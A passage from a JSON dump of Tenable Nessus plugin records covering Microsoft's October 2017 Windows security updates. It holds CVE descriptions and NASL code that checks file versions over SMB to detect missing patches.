value:\"http://www.nessus.org/u?41b63a5b\");\n # https://support.microsoft.com/en-us/help/4042123/security-update-for-windows-shell-memory-corruption-vulnerability\n# script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ccddb4d0\");\n # https://support.microsoft.com/en-us/help/4042120/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9e644606\");\n # https://support.microsoft.com/en-us/help/4042121/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53858948\");\n # https://support.microsoft.com/en-us/help/4042723/description-of-the-windows-server-2008-defense-in-depth-security-updat\n# script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c911d960\");\n # https://support.microsoft.com/en-us/help/4040685/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?86f61c93\");\n # https://support.microsoft.com/en-us/help/4041944/windows-information-disclosure-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e2287b5e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n\n - 4041671\n - 4041944\n - 4041995\n - 4050795\n - 4042067\n - 4042120\n - 4042121\n - 4042122\n - 4042050\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/12\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-10';\n\nkbs = make_list(\n \"4032201\",\n \"4034786\",\n \"4038874\",\n \"4039038\",\n \"4039266\",\n \"4039325\",\n \"4039384\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n# 4041671\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"os-kernel_31bf3856ad364e35\", file_pat:\"^ntoskrnl\\.exe$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24202'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4041671\", session:the_session);\n\n# 4041944\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"ntfs_31bf3856ad364e35\", file_pat:\"^ntfs\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24201'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4041944\", session:the_session);\n\n# 4041995\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"smbserver-common_31bf3856ad364e35\", file_pat:\"^srvnet\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24201'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4041995\", session:the_session);\n\n# 4042067\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"c..ent-indexing-common_31bf3856ad364e35\", file_pat:\"^query\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24201'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4042067\", session:the_session);\n\n# 4042120\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"win32k_31bf3856ad364e35\", file_pat:\"^win32k\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24200'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4042120\", session:the_session);\n\n# 4042121\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"gdi32_31bf3856ad364e35\", file_pat:\"^gdi32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24200'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4042121\", session:the_session);\n\n# 4050795 (fix for 4042007)\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"m..components-jetexcel_31bf3856ad364e35\", file_pat:\"^msexcl40\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('4.0.9801.2'),\n max_versions:make_list('4.0.9801.9999'),\n bulletin:bulletin,\n kb:\"4050795\", session:the_session);\n\n# 4042122\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"font-embedding_31bf3856ad364e35\", file_pat:\"^t2embed\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.24200'),\n max_versions:make_list('6.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4042122\", session:the_session);\n\n# 4042050\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"mponents-jetintlerr_31bf3856ad364e35\", file_pat:\"^msjint40\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('4.0.9801.1'),\n max_versions:make_list('4.0.9801.9999'),\n bulletin:bulletin,\n kb:\"4042050\", session:the_session);\n\n# The following two checks are commented out\n# due to released patches failing to apply\n# to relavant systems.\n## 4042123\n#files = list_dir(basedir:winsxs, level:0, dir_pat:\"t..icesframework-msctf_31bf3856ad364e35\", file_pat:\"^msctf\\.dll$\", max_recurse:1);\n#vuln += hotfix_check_winsxs(os:'6.0',\n# sp:2,\n# files:files,\n# versions:make_list('6.0.6002.16386', '6.0.6002.24202'),\n# max_versions:make_list('6.0.6002.20000', '6.0.6002.99999'),\n# bulletin:bulletin,\n# kb:\"4042123\", session:the_session);\n#\n## 4042723\n#files = list_dir(basedir:winsxs, level:0, dir_pat:\"wlansvc_31bf3856ad364e35\", file_pat:\"^wlanapi\\.dll$\", max_recurse:1);\n#vuln += hotfix_check_winsxs(os:'6.0',\n# sp:2,\n# files:files,\n# versions:make_list('6.0.6001.18000', '6.0.6002.24202'),\n# max_versions:make_list('6.0.6001.20000', '6.0.6002.99999'),\n# bulletin:bulletin,\n# kb:\"4042723\", session:the_session);\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:33:17", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4041687 or cumulative update 4041693. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory via the Microsoft Windows Text Services Framework. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8727)\n\n - A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft JET Database Engine that could allow remote code execution on an affected system. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. (CVE-2017-8717, CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the way that the Windows SMB Server handles certain requests. An authenticated attacker who successfully exploited this vulnerability could craft a special packet, which could lead to information disclosure from the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-11762, CVE-2017-11763)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the Microsoft Server Block Message (SMB) when an attacker sends specially crafted requests to the server. An attacker who exploited this vulnerability could cause the affected system to crash. To attempt to exploit this issue, an attacker would need to send specially crafted SMB requests to the target system. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests. The security update addresses the vulnerability by correcting the manner in which SMB handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11783)\n\n - An Information disclosure vulnerability exists when Windows Search improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11772)\n\n - An Security Feature bypass vulnerability exists in Microsoft Windows storage when it fails to validate an integrity-level check. An attacker who successfully exploited the vulnerability could allow an application with a certain integrity level to execute code at a different integrity level. The update addresses the vulnerability by correcting how Microsoft storage validates an integrity-level check. (CVE-2017-11818)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2017-11780)\n\n - A remote code execution vulnerability exists in Windows Domain Name System (DNS) DNSAPI.dll when it fails to properly handle DNS responses. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the Local System Account. (CVE-2017-11779)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11813, CVE-2017-11822)\n\n - An information disclosure vulnerability exists in the Windows kernel that could allow an attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (ASLR) bypass. An attacker who successfully exploited the vulnerability could retrieve the memory address of a kernel object. (CVE-2017-11784, CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows implementation of wireless networking. An attacker who successfully exploited this vulnerability could potentially replay broadcast and/or multicast traffic to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)", "modified": "2018-08-03T00:00:00", "id": "SMB_NT_MS17_OCT_4041693.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=103750", "published": "2017-10-10T00:00:00", "title": "Windows 8.1 and Windows Server 2012 R2 October 2017 Security Updates (KRACK)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103750);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/08/03 11:35:09\");\n\n script_cve_id(\n \"CVE-2017-11762\",\n \"CVE-2017-11763\",\n \"CVE-2017-11765\",\n \"CVE-2017-11771\",\n \"CVE-2017-11772\",\n \"CVE-2017-11779\",\n \"CVE-2017-11780\",\n \"CVE-2017-11781\",\n \"CVE-2017-11783\",\n \"CVE-2017-11784\",\n \"CVE-2017-11785\",\n \"CVE-2017-11790\",\n \"CVE-2017-11793\",\n \"CVE-2017-11810\",\n \"CVE-2017-11813\",\n \"CVE-2017-11814\",\n \"CVE-2017-11815\",\n \"CVE-2017-11816\",\n \"CVE-2017-11817\",\n \"CVE-2017-11818\",\n \"CVE-2017-11822\",\n \"CVE-2017-11824\",\n \"CVE-2017-13080\",\n \"CVE-2017-8689\",\n \"CVE-2017-8694\",\n \"CVE-2017-8717\",\n \"CVE-2017-8718\",\n \"CVE-2017-8727\"\n );\n script_bugtraq_id(\n 101077,\n 101081,\n 101083,\n 101093,\n 101094,\n 101095,\n 101099,\n 101100,\n 101101,\n 101108,\n 101109,\n 101110,\n 101111,\n 101114,\n 101116,\n 101122,\n 101128,\n 101136,\n 101140,\n 101141,\n 101142,\n 101144,\n 101147,\n 101149,\n 101161,\n 101162,\n 101166,\n 101274\n );\n script_xref(name:\"MSKB\", value:\"4041687\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n script_xref(name:\"MSKB\", value:\"4041693\");\n script_xref(name:\"MSFT\", value:\"MS17-4041687\");\n script_xref(name:\"MSFT\", value:\"MS17-4041693\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 October 2017 Security Updates (KRACK)\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4041687\nor cumulative update 4041693. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory\n via the Microsoft Windows Text Services Framework. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2017-8727)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11783)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - An Security Feature bypass vulnerability exists in\n Microsoft Windows storage when it fails to validate an\n integrity-level check. An attacker who successfully\n exploited the vulnerability could allow an application\n with a certain integrity level to execute code at a\n different integrity level. The update addresses the\n vulnerability by correcting how Microsoft storage\n validates an integrity-level check. (CVE-2017-11818)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - A remote code execution vulnerability\n exists in Windows Domain Name System (DNS) DNSAPI.dll\n when it fails to properly handle DNS responses. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code in the context of the Local\n System Account. (CVE-2017-11779)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11813,\n CVE-2017-11822)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)\n\");\n # https://support.microsoft.com/en-us/help/4041687/windows-81-update-kb4041687\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1c67d5c\");\n # https://support.microsoft.com/en-us/help/4041693/windows-81-update-kb4041693\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c3325f2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4041687 or Cumulative update KB4041693.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/10\");\n\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-10\";\nkbs = make_list('4041687', '4041693');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"10_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4041687, 4041693])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:33:17", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4041679 or cumulative update 4041690. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory via the Microsoft Windows Text Services Framework. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8727)\n\n - A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft JET Database Engine that could allow remote code execution on an affected system. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. (CVE-2017-8717, CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, allowing an attacker to retrieve information from a targeted system. By itself, the information disclosure does not allow arbitrary code execution; however, it could allow arbitrary code to be run if the attacker uses it in combination with another vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the way that the Windows SMB Server handles certain requests. An authenticated attacker who successfully exploited this vulnerability could craft a special packet, which could lead to information disclosure from the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-11762, CVE-2017-11763)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the Microsoft Server Block Message (SMB) when an attacker sends specially crafted requests to the server. An attacker who exploited this vulnerability could cause the affected system to crash. To attempt to exploit this issue, an attacker would need to send specially crafted SMB requests to the target system. Note that the denial of service vulnerability would not allow an attacker to execute code or to elevate their user rights, but it could cause the affected system to stop accepting requests. The security update addresses the vulnerability by correcting the manner in which SMB handles specially crafted client requests.\n (CVE-2017-11781)\n\n - An Information disclosure vulnerability exists when Windows Search improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n 